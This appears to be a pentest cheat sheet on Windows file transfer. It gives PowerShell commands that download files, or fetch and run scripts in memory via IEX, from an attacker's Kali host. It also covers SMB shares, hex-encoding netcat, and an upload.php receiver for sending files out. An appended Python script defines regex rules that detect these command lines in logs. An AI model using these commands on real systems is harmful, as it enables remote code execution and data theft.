- PowerShell one-liner download
powershell.exe -c "(New-Object System.Net.WebClient).DownloadFile('http://<KALI IP>/<FILE>', '<FILE>')"
iwr -uri http://<KALI IP>/<FILE> -Outfile <FILE>
- Run a PowerShell script in memory without saving it to disk
powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://<KALI IP>/<SCRIPT>.ps1')
Uploading Files with SMB
- Start an SMB server on Kali
impacket-smbserver <share name> <folder>
#ex. impacket-smbserver robogroot .
- Mount the share on Windows
net use * \\<KALI IP>\<SHARE NAME>
#ex. net use * \\192.168.1.5\robogroot
- Copy files to Windows
copy Z:\<file>
#ex. copy Z:\nc.exe
Windows Downloads with exe2hex and PowerShell
- Inside Kali, run:
upx -9 nc.exe
exe2hex -x nc.exe -p nc.cmd
Paste the output of nc.cmd into the Windows victim machine
Windows Uploads Using PowerShell
- Step 1: Create upload.php inside /var/www/html
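<?php
// Save into a directory writable by www-data; basename() strips path components from the client-supplied name.
$uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . basename($_FILES['file']['name']);
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile);
?>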
sudo mkdir /var/www/uploads
sudo chown www-data: /var/www/uploads
sudo systemctl restart apache2
- Step 2: Post the file from Windows
powershell -c "(New-Object System.Net.WebClient).UploadFile('http://<KALI IP>/upload.php', '<FILE>')"
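
Seen from the defending side, the one-liners above leave recognizable process command lines. The following is an added example, not part of the original page: it matches those command lines in process-creation logs. The rule names are hypothetical, and the host names, the 192.0.2.10 address and the log lines are constructed.

```python
import re

# Heuristic rules for the transfer one-liners on this page. Rule names are
# hypothetical. Matching is case-insensitive because PowerShell ignores case.
RULES = [
    ("webclient-download-file", r"net\.webclient\b.*\.downloadfile\s*\("),
    ("webclient-download-string", r"net\.webclient\b.*\.downloadstring\s*\("),
    ("webclient-upload-file", r"net\.webclient\b.*\.uploadfile\s*\("),
    # Matches -OutFile and its abbreviations down to -OutF.
    ("invoke-webrequest-outfile", r"\b(iwr|invoke-webrequest)\b.*\s-outf"),
    ("iex-remote-content", r"\b(iex|invoke-expression)\b.*\bhttps?://"),
    # "net use *" against a UNC path maps the share to the next free letter.
    ("net-use-wildcard-unc", r"\bnet(\.exe)?\s+use\s+\*\s+\\\\"),
]
COMPILED = [(name, re.compile(rx, re.IGNORECASE)) for name, rx in RULES]

# Constructed process command lines (host, command line); 192.0.2.10 is a
# documentation address and the file names are placeholders.
SAMPLE_EVENTS = [
    ("WS01", r"powershell.exe -c (New-Object System.Net.WebClient).DownloadFile('http://192.0.2.10/a.bin', 'a.bin')"),
    ("WS02", r"powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://192.0.2.10/s.ps1')"),
    ("WS03", r"powershell.exe iwr -Uri http://192.0.2.10/a.bin -OutFile a.bin"),
    ("WS04", r"net use * \\192.0.2.10\share"),
    ("WS05", r"powershell -c (new-object system.net.webclient).uploadfile('http://192.0.2.10/upload.php', 'report.txt')"),
    ("WS06", r"powershell.exe -c Get-ChildItem C:\Users"),   # benign
    ("WS07", r"net use Z: \\fileserver\dept"),               # benign, no wildcard
]

def classify(cmdline):
    """Return the names of all rules that match one command line."""
    return [name for name, rx in COMPILED if rx.search(cmdline)]

def scan(events):
    """Return (host, rule names) for every event that matched a rule."""
    hits = []
    for host, cmdline in events:
        matched = classify(cmdline)
        if matched:
            hits.append((host, matched))
    return hits

if __name__ == "__main__":
    for host, matched in scan(SAMPLE_EVENTS):
        print(f"{host}: {', '.join(matched)}")
```

These are string heuristics: they only see what reaches the command line, so script block logging is the better source when the command is encoded or built at run time.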